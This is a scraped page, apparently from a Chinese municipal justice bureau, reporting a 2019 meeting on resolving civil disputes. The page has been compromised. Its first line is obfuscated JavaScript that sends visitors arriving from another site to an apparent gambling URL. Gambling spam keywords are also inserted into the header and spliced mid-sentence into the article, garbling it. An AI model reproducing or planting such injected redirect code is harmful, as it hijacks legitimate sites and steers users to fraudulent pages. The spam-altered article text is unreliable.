var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 基层工作·司法鉴定
发布日期:2019-10-25 浏览次数: 字号:[ ]

10月25日,市司法局召开全市矛盾纠纷分析研判会议,市司法局副局长蔡加龙,各县(市、区)司法局分管副局长、人民参与和促进法治科科长等参加会议。

会上,各县(市、区)司法局交流了三季度矛盾纠纷排查化解情况,市局人民参与和促进法治处对四季度工作进行了部署。

蔡加龙副局长对各地矛盾纠纷排查化解工作给予了充分肯定并指出了不足之处,同时提出了三点要求:一要以“守初心、担使命”的要求来开展各项工作。持续深入开展扫黑除恶专项斗争和涉民营企业矛盾纠纷排查化解专项活动等重点工作,切实将工作落实到行动上。二要以时不我待的要求将调解关口不断前移。要认真分析各地矛盾纠纷特点,进一步加大矛盾纠纷排查力度,坚持早发现、早预防,进一步强化组织队伍保障,切实将矛盾消灭在萌芽状态。三要以强化责任担当的要求做好司法所创建工作。各地要积极主动申报创建省、市级“文明规范公正”司法所,既要服务好党委政府又要争取当地党委政府支持司法所建设,要学习各地在司法所建设上的先进经验和典型做法,不断提升bbin宝盈,bbin下载:司法所规范化水平。

三季度矛盾纠纷分析研判会.jpg

市局人民参与和促进法治处




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统